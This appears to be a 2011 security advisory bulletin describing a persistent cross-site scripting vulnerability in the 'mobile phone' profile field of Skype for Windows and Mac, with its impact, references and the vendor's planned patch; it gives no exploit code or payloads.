You are here

T-670: Skype Input Validation Flaw in 'mobile phone' Profile Entry Permits Cross-Site Scripting Attacks

July 18, 2011 - 7:09am

Addthis

PROBLEM:

A vulnerability was reported in Skype. A remote user can conduct cross-site scripting attacks.

PLATFORM:

5.3.0.120 and prior versions

ABSTRACT:

The software does not properly filter HTML code from user-supplied input in the The "mobile phone" profile entry before displaying the input.

reference LINKS:

SecurityTracker Alert ID: 1025789
Skype Security Advisory
KoreSecure News
H Security ID: 1279864

IMPACT ASSESSMENT:

High

Discussion:

Skype suffers from a persistent Cross-Site Scripting vulnerability due to a lack of input validation and output sanitization of the "mobile phone" profile entry. Other input fields may also be affected.

The software does not properly filter HTML code from user-supplied input in the The "mobile phone" profile entry before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the Skype software and will run in the security context of that application. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the application, access data recently submitted by the target user via web form to the application, or take actions on the application acting as the target user.

Impact:

An attacker could trivially hijack session IDs of remote users and leverage the vulnerability to increase the attack vector to the underlying software and operating system of the victim.

There is a Cross Site Scripting (XSS) vulnerability present in the Skype Home area of the Skype for Windows client. This could allow an attacker to embed JavaScript in the mobile phone field of their profile description. Skype fails to adequately filter this field which means that if one of the attacker's contacts logs into Skype, the embedded JavaScript can be executed automatically without further user intervention. An attacker could exploit this to retrieve the session cookie.

Solution:

Skype 5.3.0.120 (the current version) and earlier for Windows and Mac are affected. The Linux version is not affected.

Skype has now confirmed it is aware of the hole and has already developed a patch to be published within the next week. Skype provides a plausible explanation as to why the problem isn't immediately reproducible: to take advantage of it, the attacker must appear in the victim's list of frequent contacts.

Addthis